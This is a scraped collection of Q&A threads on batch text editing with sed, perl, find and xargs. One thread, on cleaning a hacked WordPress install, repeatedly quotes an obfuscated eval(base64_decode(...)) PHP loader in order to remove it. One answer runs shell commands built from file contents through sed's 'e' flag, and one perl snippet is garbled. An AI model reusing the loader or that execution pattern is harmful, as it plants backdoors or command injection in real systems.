I'm trying to batch rename text files according to a string they contain.
I used sed to isolate the pattern with \( and \) as I couldn't get this to work in grep.
sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt | mv *.txt $sed.txt
(the text I want to use as filename is between html title tags)`
Where I wrote $sed would be the output of sed.
hope that's clear!
A simple loop in bash can accomplish this. If each file is valid HTML, meaning you have only one <title> tag in the file, you can rename them all this way:
for file in *.txt; do
mv "$file" `sed -n 's/<title>\([^<]*\)<\/title>/\1/p;' $file| sed -e 's/[ ][ ]*/_/g'`.txt
done
So, if you have files 1.txt, 2.txt and 3.txt, each with cat, dog and my hippo in their TITLE tags, you'll end up with cat.txt, dog.txt and my_hippo.txt after the above loop.
EDIT: quoted initial $file in case there are spaces in filenames; and added a second sed to convert any spaces in the <title> tag to _'s in resulting filenames. NOTE the whitespace inside the []'s in the second sed command is a literal space and tab character.
You can enclose expression in grave accent characters (`) to make it insert its output to the place you want. Try:
mv *.txt `sed -i '' 's/<title>\(.*\)<\/title>/&/g' *.txt`.txt
It is rather not flexible, but should work.
(I haven't used it in a while and cannot test it now, so I might be wrong).
Here is the command I would use:
for i in *.txt ; do
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
done
The sed substitution search for pattern in each one of your .txt files. For each file it creates string mv 'file_name' 'found_pattern'.
With the e command at the end of sed commands, this resulting string is directly executed in terminal, thus it renames your files.
Some hints:
Note the use of =s instead of /s as delimiters for sed substition: it's more readable as you already have /s in your pattern (you could use many other symbols if you don't like =). And in this way you don't have to escape the / in your pattern.
The e command for sed executes the created string.
(I'm speaking of this one below:
sed "s=<title>\(.*\)</title>=mv '$i' '\1'=e" $i
^
)
So use it with caution! I would recommand to first use the line without final e: it won't execute any mv command, but just print instead what would be executed if you were to add the e.
What I read from your question is:
you have a number of text (html) files in a directory
each file contains at least the tag <title> ... </title>
you want to extract the content (elements.text) and use it as filename
last you want to rename that file to the extracted filename
Is this correct?
So, then you need to loop through the files, e.g. with xargs or find
ls '*.txt' | xargs -i\{\} command "{}" ...
find -maxdepth 1 -type f -name '*.txt' -exec command "{}" ... \;
I always replace the xargs substitues by -i\{\} because the resulting command is compatible if I use it sometimes with find and its substitute {}.
Next the -maxdepth option will help find not to dive deeper in directory, if no subdir, you can leave it out.
command could be something very simple like echo "Testing File: {}" or a really small script if you use it with bash:
find . -name '*.txt' -exec bash -c 'CUR_FILE="{}"; echo "Working on: $CUR_FILE"; ls -l "$CUR_FILE";' \;
The big decision for your question is: how to get the text from title element.
A simple solution (suitable if opening and closing tag is on same textline) would be by grep
A more solid solution is to use a HTML Parser and navigate by DOM operation
The simple solution base on:
get the title line
remove the everything before and after title content
So do it together:
ls *.txt | xargs -i\{\} bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"'
Same with usage of find:
find . -maxdepth 1 -type f -name '*.txt' -exec bash -c 'TITLE=$(egrep "<title>[^<]*</title>" "{}"); NEW_FNAME=$(echo "$TITLE" | sed -e "s#.*<title>\([^<]*\)</title>.*#\1#"); mv -v "{}" "$NEW_FNAME.txt"' \;
Hopefully it is what you expected.
Related
I'm trying to pipe the output of a find command to a perl one-liner to replace a line that ends with ?> with RedefineForDocker::standardizeXmlmc() but for some reason the value isn't being replaced. I've checked the output of the find command and it is performing as expected, and I've double checked my regex and it should match.
find . -name *.php -exec ggrep -Ezl 'class XmlMethodCall.*([?]>)$' {} \; \
| xargs perl -ewpn -i.bak2 \
"s/[?]>\s*?$/RedefineForDocker::standardizeXmlmc()\n/gm"
I get no warnings and no indication that it isn't working, the backups are created, but the file remains unchanged. The list of matched files run from the find command is below.
./swsupport/clisupp/trending/services/data.helpers.php
./swsupport/clisupp/_bpmui/arch/service/data.helpers.php
./swsupport/clisupp/_bpmui/itsm/service/data.helpers.php
./swsupport/clisupp/_bpmui/itsm_default/service/data.helpers.php
./webclient_code/php/session.php
./webclient_code/service/storedquery/helpers.php
./php/_phpinclude/itsm/xmlmc/xmlmc.php
./php/_phpinclude/itsmf/xmlmc/xmlmc.php
./php/_phpinclude/itsm_default/xmlmc/xmlmc.php
Here is an example of one of the files it should match
https://regex101.com/r/BUoCif/1
Run your perl command as this:
perl -i.bak2 -wpe 's/\?>\h*$/RedefineForDocker::standardizeXmlmc()\n/gm'
Order of command line option is important here.
Full pipeline should be like this:
find . -name '*.php' -exec ggrep -PZzl '(?ms)class XmlMethodCall.*\?>\h*$' {} + |
xargs -0 perl -i.bak2 -wpe 's/\?>\h*$/RedefineForDocker::standardizeXmlmc()\n/gm'
Note use -Z option in grep and -0 option in xargs to address issues with filenames with whitespaces etc.
Consider the following bash script with a simple regular expression:
for f in "$FILES"
do
echo $f
sed -i '/HTTP|RT/d' $f
done
This script shall read every file in the directory specified by FILES and remove the lines with occurrences of 'http' or 'RT' However, it seems that the OR part of the regular expression is not working. That is if I just have sed -i '/HTTP/d' $f then it will remove all lines containing HTTP but I cannot get it to remove both HTTP and RT
What must I change in my regular expression so that lines with HTTP or RT are removed?
Thanks in advance!
Two ways of doing it (at least):
Having sed understand your regex:
sed -E -i '/HTTP|RT/d' $f
Specifying each token separately:
sed -i '/HTTP/d;/RT/d' $f
Before you do anything, run with the opposite, and PRINT what you plan to DELETE:
sed -n -e '/HTTP/p' -e '/RT/p' $f
Just to be sure you are deleting only what you want to delete before actually changing the files.
"It's not a question of whether you are paranoid or not, but whether you are paranoid ENOUGH."
Well, first of all, it will process all WORDS in the FILES variable.
If you want it to do all files in the FILES directory, then you need something like this:
for f in $( find $FILES -maxdepth 1 -type f )
do
echo $f
sed -i -e '/HTTP/d' -e '/RT/d' $f
done
You just need two "-e" options to sed.
Is there a good regex to find all of the files that do not contain a certain character? I know there are lots to find lines containing matches, but I want something that will find all files that do not contain my match.
Using ls and sed to replace all filenames with no extension (i.e. not containing a .) with NoExtension:
ls | sed -e 's/^[^.]*$/NoExtension/g'
replacing filenames that have an extension with their extension:
ls | sed -e 's/^[^.]*$/NoExtension/g' -e 's/.*\.\(.*\)/\1/'
for bash - to list all files in a directory-:
shopt -s extglob
ls !(*.*)
The extglob setting is required to enable to ! which negates the . argument to ls.
You should discard all the answers that parse the output of ls read here for why. The tool find is perfect for this.
# Show files in cwd
$ ls
file file.txt
# Find the files with an extension
$ find -type f -regex '.*/.*\..*$'
./file.txt
# Invert the match using the -not option
$ find -type f -not -regex '.*/.*\..*$'
./file
And an awk solution, for good measure.
ls | awk '$0 !~ /\..+$/{a++}END{print a}'
This might work for you (find, GNU sed & wc):
find . -type f | sed -rn '\|.*/\.?[^.]+$|w NoExtensions' && wc -l NoExtensions
This gives you a count and a list.
N.B. dot files without extensions are included.
I've got a hacked wordpress install I'd like to clean up. Every single .php file has had this inserted at the top:
<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>
I'd like to replace that string with nothing in every .php file in the wordpress directory including subs. What's my best option? I've got bash, python, perl, php and so on.
I've tried:
perl -pi -e 's/<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>//g' *.php
Bareword found where operator expected at -e line 1, near "s/<?php\ /**/eval"
syntax error at -e line 1, near "s/<?php\ /**/eval"
Identifier too long at -e line 1.
and
sed -i 's/<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>//g' *.php
sed: -e expression #1, char 15: unknown option to `s'
#!/usr/bin/perl
use warnings;
use strict;
use File::Find;
# get a list of files
local #ARGV;
find sub {push #ARGV, $File::Find::name if /\.php$/}, '.';
# do in-place editing
$^I = '.bak';
while (<>) {
print unless $_ eq "<?php /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0=')); ?>\n";
}
Note that in your base string, you already have the reg-exp delimiter used by default (and you are using) the '/' char in your perl and sed.
You can either escape all those like '\/' OR you can use a different char for the reg-exp delimiter. For sed, try
sed -i 's#<?php\ /**/eval(base64_decode('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='));\ ?>##g' *.php
For some seds, you have to 'tell' sed you are changing up. only the initial reg-exp delimiter needs an esacpe char, i.e. sed -k 's\#<....##g' *.php
I hope this helps.
P.S. as you appear to be a new user, if you get an answer that helps you please remember to mark it as accepted, and/or give it a + (or -) as a useful answer.
The problem is that '/' exists in the string you want to match, and you are using '/' as your pattern delimiter. Luckily, Perl allows you to specify alternate delimiters, so use one that is not in the string you are matching:
perl -pn -i.bak -e "s{<?php\ /\*\*/eval\(base64_decode\('aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\)\);\ \?>}{}g;" `find . -name '*.php'`
I modified the command a bit. It is always good practice to create backup files when doing in-place edits in case there is an error or you need to verify (via diff) that the command did what you expect (I have a perl program that allows me to easily rename the .bak files back in case I need to reset things).
I also use a find command to get the list of all .php files in and below the current directory. If working in a flat directory, your *.php is sufficient.
You also need to escape regex specials in the string you want to match. Example the '*', '?', and '()' characters need to be escaped.
If the command works as expected, you can run the following command to remove the .bak files:
/bin/rm `find . -name '*.bak'`
find ./*php | xargs -t -i perl -pi -e "s/<\?php\s+\/\*\*\/eval\(base64_decode\(\'\S+\'\)\);\s+\?>//;" {}
Feel free to substitute the ginormous base64 string instead of \S+
Try this:
sed -i -r 's/<\?php\ \/\*\*\/eval\(base64_decode\('\''aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\''\)\); \?>//' *.php
Things I changed:
escaped all regexp symbols in your code (e.g. (, ), * and ?)
replaced ' with '\'' in your code, which is the only way to put a ' in a '-delimited string in bash
If you want to recursively replace *.php even in subdirectories of this directory:
find -print0 | xargs -0 sed -i -r 's/<\?php\ \/\*\*\/eval\(base64_decode\('\''aWYoZnVuY3Rpb25fZXhpc3RzKCdvYl9zdGFydCcpJiYhaXNzZXQoJEdMT0JBTFNbJ21mc24nXSkpeyRHTE9CQUxTWydtZnNuJ109Jy9ob21lL2plZmZqb2tlcy93d3cuamVmZmpva2VzLmNvbS9odGRvY3Mvd3AtY29udGVudC90aGVtZXMvZGVmYXVsdC9pbWFnZXMvLnN2bi90bXAvcHJvcC1iYXNlL3N0eWxlLmNzcy5waHAnO2lmKGZpbGVfZXhpc3RzKCRHTE9CQUxTWydtZnNuJ10pKXtpbmNsdWRlX29uY2UoJEdMT0JBTFNbJ21mc24nXSk7aWYoZnVuY3Rpb25fZXhpc3RzKCdnbWwnKSYmZnVuY3Rpb25fZXhpc3RzKCdkZ29iaCcpKXtvYl9zdGFydCgnZGdvYmgnKTt9fX0='\''\)\); \?>//'
Note that I've used -print0 and -0 so it doesn't break with files with spaces.
Here's a bash 4+ script
#!/bin/bash
shopt -s globstar
shopt -s nullglob
for php in **/*.php
do
data=$(<"$php")
a=${data%%<?php*}
echo "$a ${data#*?>}" > t && mv t "$php"
done
I have nested subdirectories containing html files. For each of these html files I want to delete from the top of the file until the pattern <div id="left-
This is my attempt from osx's terminal:
find . -name "*.html" -exec sed "s/.*?<div id=\"left-col/<div id=\"left-col/g" '{}' \;
I get a lot of html output in the termainal, but no files contain the substitution or are written.
There are two problems with your command. The first problem is that you aren't selecting an output location for sed. The second is that your sed script is not doing what you want it to do: the script you posted will look at each line and delete everything ON THAT LINE before the <div>. Lines without the <div> will be unaffected. You may want to try:
find . -name "*.html" -exec sed -i.BAK -n "/<div id=\"left-col/,$ p" {} \;
This will also automatically back up your files by appending .BAK to the original versions. If this is undesirable, change -i.BAK to simply -i.
You're outputting the result of the sed regex to stdout, the console, when you want to be writing it to the file.
To perform find and replace with sed, use the -i flag:
find . -name "*.html" -exec sed -i "s/.*?<div id=\"left-col/<div id=\"left-col/g" '{}' \;
Make sure you backup your files before performing this command, if possible. Otherwise you risk data-loss from a mistyped regex.
You're not storing the output of sed anywhere; that's why it's spitting out the html.